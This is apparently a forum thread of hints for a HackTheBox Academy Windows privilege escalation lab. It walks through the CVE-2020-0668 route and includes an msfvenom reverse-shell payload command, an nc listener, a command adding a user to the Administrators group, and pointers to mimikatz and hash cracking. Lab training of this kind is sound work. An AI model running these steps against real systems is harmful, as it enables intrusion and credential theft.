Windows Privilege Escalation Skills Assessment - Part II

Escalate privileges to SYSTEM and submit the contents of the flag.txt file on the Administrator Desktop . Trying From A long time | Tried Many Exploits Noting Seems To Work.
Any Hint.

Ok, so just read this if you are really really trapped and since nobody was replying.

To get privilege escalation there is section that explains how to use CVE-2020-0668
Since I was not able to “build” the “.exe” file from the source, what I just did was downloading the .exe files provided in the section machine that explains that CVE into my Linux Machine, re-spawn the Skill Assesment Part II machine and pass the .exe files. You can easily do this sharing the “/tmp” folder from our attacker machine with the Windows target machine Network using

xfreerdp /v:<target-ip> /u:htb-student /p:'HTB_@cademy_stdnt!' /drive:linux,/tmp

so you have a “shared” folder between our Linux attacker machine and Windows target machine.

You can follow the steps as the Academy teaches.
However, when you try to get Meterpreter reverse shell, at least for me, I got the following error when I use commands:
[-] Error running command getuid: Rex::TimeoutError Send timed out

So, for this reason, instead of generating a malicious binary that uses Meterpreter, just do the old fashion way and create a simple .exe reverse shell with msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp lhost=<your attacker ip> lport=<your listening port> -f exe > ma****.exe
and, before starting the “infected” service, just remember to run nc:
nc -lvnp <listening port>

To get the system network user password (which could be used in other circumstances to pivoting), you have two options:

  • Use mimikatz.exe
  • Using our privileged reverse shell, add our user to Administrators group (“net localgroup Administrators htb-student /add”), use (do NOT use ‘just-dc’ flags) and crack the hashes with your favorite tool

Happy hacking


oh sory guys, i already finish the assessment II while above. above text is hint that others ask me before

the steps given to accomplish the task given by @GunZF0x are fair enough and precise… please if you can further elaborate the issue you are facing

Yes follow these steps and get the executable from the previous module it will make your life easier. Also msfconsole has a module but it doesnt work for some reason in this lab so dont waste time with it :slight_smile:

Just my 2 cents on this exercise:

Thanks so much! This has saved me a good chunk of time… It feels like they’ve added these skill assessments to mess with us and get us thinking outside the box. It’s a bit much sometimes

1 Like

The first question to find the cleartext password for the iamtheadministrator account was the hardest for me.

There is good advice in here on how to do it. WinPEAs or SharpUp.exe will get you to where you need to go.

But it won’t put it right in your face. You may need to look in something.

Anyway, this was a good lab and a great example of why you shouldn’t just leave passwords *cough * unattended * cough * :wink: